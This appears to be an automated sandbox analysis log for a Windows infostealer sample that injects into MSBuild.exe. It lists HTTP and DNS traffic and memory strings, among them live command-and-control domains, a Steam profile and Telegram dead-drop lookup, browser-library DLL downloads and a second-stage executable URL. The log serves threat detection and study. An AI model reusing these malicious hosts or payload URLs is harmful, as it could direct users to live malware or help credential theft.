Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_00406963

Source: global traffic	HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: kasm.zubairgul.com
Source: global traffic	DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic	DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic	DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic	DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic	DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic	DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic	DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic	DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic	DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.ECAEBA
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgEBA
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoECAKFBG
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.multipart/form-data;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/Z
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/freebl3.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/freebl3.dll7
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/mozglue.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dll2
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dll9
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/nss3.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/nss3.dllVO
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/softokn3.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/sql.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dlle
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000481000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80
Source: MSBuild.exe, 00000005.00000002.1773441370.00000000004C0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80/sql.dll
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80ontent-Disposition:
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000005.00000002.1788617415.000000001FFDD000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.5.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GIIEGH.5.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: GIIEGH.5.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GIIEGH.5.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GIIEGH.5.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GIIEGH.5.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GIIEGH.5.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GIIEGH.5.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
